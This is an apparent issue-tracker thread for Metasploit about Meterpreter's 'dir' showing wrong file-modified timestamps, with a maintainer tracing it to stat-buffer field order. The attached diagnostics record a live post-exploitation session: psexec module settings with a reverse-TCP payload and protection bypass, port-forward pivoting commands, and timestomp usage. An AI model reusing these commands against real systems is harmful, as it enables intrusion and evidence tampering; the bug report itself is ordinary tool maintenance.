dir of directory not displaying file modified timestamps

[quantumburnz]

Steps to reproduce

1. dir a directory such as:
   dir "c:\Windows\System32\winevt\Logs"
   dir "c:\Windows\System32\LogFiles\Scm"
2. Note the timestamps in the "Last modified" column
3. dir an individual file in the directory that has been modified since creation
   dir "c:\Windows\System32\LogFiles\Scm\5c571bff-df7d-4678-8297-7a6e5833b2e3"
   dir "c:\Windows\System32\winevt\Logs\Security.evtx"
4. Alternatively, review the output of timestomp -v
   timestomp -v "c:\Windows\System32\LogFiles\Scm\5c571bff-df7d-4678-8297-7a6e5833b2e3"
   timestomp -v "c:\Windows\System32\winevt\Logs\Security.evtx"
5. Compare the modified times, and you'll notice they don't match; instead, the timestamps from the dir in step 1. correlate with Accessed or Created times.

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

meterpreter > sysinfo
Computer : REDACTED
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : REDACTED
Logged On Users : 2
Meterpreter : x64/windows

Example output and discrepancy

meterpreter > dir "c:\Windows\System32\LogFiles\Scm"
Listing: c:\Windows\System32\LogFiles\Scm
=========================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  20      fil   2009-07-14 00:06:38 -0500  521d1619-41b3-4344-9aef-046f98f949a5
100666/rw-rw-rw-  12      fil   2009-07-14 00:06:38 -0500  5c571bff-df7d-4678-8297-7a6e5833b2e3

meterpreter > timestomp -v "c:\Windows\System32\LogFiles\Scm\5c571bff-df7d-4678-8297-7a6e5833b2e3"
[*] Showing MACE attributes for c:\Windows\System32\LogFiles\Scm\5c571bff-df7d-4678-8297-7a6e5833b2e3
Modified      : 2021-11-29 06:42:48 -0600
Accessed      : 2009-07-14 00:06:38 -0500
Created       : 2009-07-14 00:06:38 -0500
Entry Modified: 2021-11-29 06:42:48 -0600

meterpreter > dir "c:\Windows\System32\LogFiles\Scm\5c571bff-df7d-4678-8297-7a6e5833b2e3"
100666/rw-rw-rw-  12  fil  2021-11-29 06:42:48 -0600  c:\Windows\System32\LogFiles\Scm\5c571bff-df7d-4678-8297-7a6e5833b2e3

Were you following a specific guide/tutorial or reading documentation?

N/A

Expected behavior

dir of directory should show proper modified timestamps

Current behavior

dir of directory appears to be showing Accessed or Created times

Metasploit version

Framework: 6.1.11-dev
Console : 6.1.11-dev

Additional Information

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse

[framework/ui/console]
ActiveModule=exploit/windows/local/current_user_psexec

[windows/local/current_user_psexec]
WfsDelay=10
WORKSPACE=
VERBOSE=false
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=true
SESSION=68
EXE::EICAR=false
EXE::Custom=
EXE::Path=
EXE::Template=
EXE::Inject=false
EXE::OldMethod=false
EXE::FallBack=false
MSI::EICAR=false
MSI::Custom=
MSI::Path=
MSI::Template=
MSI::UAC=false
Powershell::persist=false
Powershell::prepend_sleep=
Powershell::prepend_protections_bypass=true
Powershell::strip_comments=true
Powershell::strip_whitespace=false
Powershell::sub_vars=true
Powershell::sub_funcs=false
Powershell::exec_in_place=false
Powershell::exec_rc4=false
Powershell::remove_comspec=false
Powershell::noninteractive=true
Powershell::encode_final_payload=false
Powershell::encode_inner_payload=false
Powershell::wrap_double_quotes=true
Powershell::no_equals=false
Powershell::method=reflection
INTERNAL_ADDRESS=REDACTED
NAME=
DISPNAME=
TECHNIQUE=SMB
RHOSTS=REDACTED
KERBEROS=false
PAYLOAD=windows/x64/meterpreter/reverse_tcp
LHOST=REDACTED
LPORT=8082
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
PrependMigrate=false
PrependMigrateProc=
EXITFUNC=process
PayloadBindPort=
AutoLoadStdapi=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
loglevel=3

History

The following commands were ran during the session and before this issue occurred:

Collapse

563    sessions -K
564    jobs
565    sessions
566    sessions -K
567    sessions
568    jobs
569    sessions
570    sessions -i 65
571    sessions -i 66
572    sessions -i 65
573    sessions
574    jobs
575    sessions
576    search psexec
577    sessions -i 68
578    use exploit/windows/local/current_user_psexec
579    show options
580    set RHOSTS REDACTED
581    set SESSION 68
582    set TECHNIQUE SMB
583    jobs
584    set payload windows/x64/meterpreter/reverse_tcp
585    set lhost REDACTED
586    set lport 8081
587    show options
588    run
589    show advanced
590    sessions
591    set DisablePayloadHandler true
592    set INTERNAL_ADDRESS REDACTED
593    show options
594    run
595    sessions
596    sessions -i 72
597    sessions
598    sessions -i 68 -c "portfwd add -R -p 8082 -L 127.0.0.1 -l 8081"
599    sessions -h
600    sessions -i 68 -C "portfwd add -R -p 8082 -L 127.0.0.1 -l 8081"
601    show options
602    set LHOST REDACTED
603    set LPORT 8082
604    show options
605    run
606    sessions
607    sessions -i 70
608    version
609    `set loglevel 3
610    set loglevel 3
611    sessions -i 70
612    debug

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse

[11/29/2021 10:22:32] [e(0)] meterpreter: stdapi_fs_delete_file: Operation failed: The filename, directory name, or volume label syntax is incorrect.
[11/29/2021 10:22:47] [e(0)] meterpreter: stdapi_fs_delete_file: Operation failed: The system cannot find the file specified.
[11/29/2021 10:23:26] [e(0)] meterpreter: stdapi_fs_delete_file: Operation failed: The filename, directory name, or volume label syntax is incorrect.
[11/29/2021 10:32:56] [e(0)] meterpreter: stdapi_fs_delete_file: Operation failed: The system cannot find the file specified.
[11/29/2021 10:33:00] [e(0)] meterpreter: stdapi_fs_delete_file: Operation failed: Access is denied.
[11/29/2021 10:34:28] [e(0)] meterpreter: Error running command lcd: Errno::ENOENT No such file or directory @ dir_s_chdir - ~/REDACTED/fromTargets
[11/29/2021 10:34:44] [e(0)] meterpreter: Error running command lcd: Errno::ENOENT No such file or directory @ dir_s_chdir - ~/fromTargets
[11/29/2021 10:34:59] [e(0)] meterpreter: Error running command lcd: Errno::ENOENT No such file or directory @ dir_s_chdir - ~/fromTargets
[11/29/2021 11:05:12] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[11/29/2021 11:05:12] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse

[11/29/2021 10:34:44] [d(0)] meterpreter: Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb:331:in `chdir'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb:331:in `cmd_lcd'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:557:in `run_command'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:102:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:64:in `block in interact'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:157:in `run'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:62:in `interact'
/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:555:in `_interact'
/usr/share/metasploit-framework/lib/rex/ui/interactive.rb:53:in `interact'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1543:in `cmd_sessions'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:557:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[11/29/2021 10:34:59] [e(0)] meterpreter: Error running command lcd: Errno::ENOENT No such file or directory @ dir_s_chdir - ~/fromTargets
[11/29/2021 10:34:59] [d(0)] meterpreter: Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb:331:in `chdir'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb:331:in `cmd_lcd'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:557:in `run_command'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:102:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:64:in `block in interact'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:157:in `run'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:62:in `interact'
/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:555:in `_interact'
/usr/share/metasploit-framework/lib/rex/ui/interactive.rb:53:in `interact'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1543:in `cmd_sessions'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:557:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:506:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:500:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[11/29/2021 11:04:25] [d(0)] core: HistoryManager.pop_context name: :meterpreter
[11/29/2021 11:05:12] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[11/29/2021 11:05:12] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[11/29/2021 11:05:24] [d(0)] core: HistoryManager.push_context name: :meterpreter
[11/29/2021 11:05:43] [d(0)] core: HistoryManager.pop_context name: :meterpreter

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Collapse

Framework: 6.1.11-dev
Ruby: ruby 2.7.4p191 (2021-07-07 revision a21a3b7d23) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify

[smcintyre-r7]

Alright yeah I was able to reproduce this. The modified timestamp is different in the output of Meterpreter's dir command as it is from the timestomp -v command. According to Powershell (as validated through (Get-Item "file").LastWriteTime, timestomp is correct and dir is incorrect. I'll take a look and see if I can get a fix for this.

[smcintyre-r7]

Another interesting piece of behavior here is that the dir command is not even consistent with itself. If you run a dir on the directory as I did in my previous comment, the result does not match timestomp or Powershell, but if you run dir on the file itself, it does.

Notice the difference in the Last Modified timestamp for the two entries of Setup.evtx:

100666/rw-rw-rw-  130093056  fil   2020-02-26 15:09:20 -0500  Security.evtx
100666/rw-rw-rw-  1052672    fil   2020-02-26 15:09:31 -0500  Setup.evtx
100666/rw-rw-rw-  69632      fil   2020-02-26 12:11:06 -0500  State.evtx
100666/rw-rw-rw-  5312512    fil   2020-02-26 15:09:20 -0500  System.evtx
100666/rw-rw-rw-  1118208    fil   2020-02-26 15:09:20 -0500  Windows PowerShell.evtx
100666/rw-rw-rw-  69632      fil   2020-02-27 16:29:39 -0500  microsoft-windows-diagnosis-scripted%4operational.evtx

meterpreter > dir "c:\Windows\System32\winevt\Logs\Setup.evtx"
100666/rw-rw-rw-  1052672  fil  2021-12-03 18:15:52 -0500  c:\Windows\System32\winevt\Logs\Setup.evtx

[quantumburnz]

@smcintyre-r7 - I experienced this as well. It seems the dir of an individual file is correct, but I suspect the dir of a directory shows each file's creation time instead of modified time.

[smcintyre-r7]

You're right, it's swapping the timestamps and I figured out why. When you run dir on a single file, it's actually just returning the stat which uses this function to unpack the stat buffer. When you run dir on a directory, it uses this other function to unpack the stat buffer. You can see that the order of the last 3 fields is different between the two. Finally for reference, Meterpreter uses this order for the fields.

Now that I know what the problem is, I just need to figure out what the "correct" order is based on the other Meterpreters and switch the one(s) that are incorrect to it.

Thanks for reporting this bug! I have everything I need to get it sorted out now.

[quantumburnz]

Glad you tracked it down, thank you @smcintyre-r7 !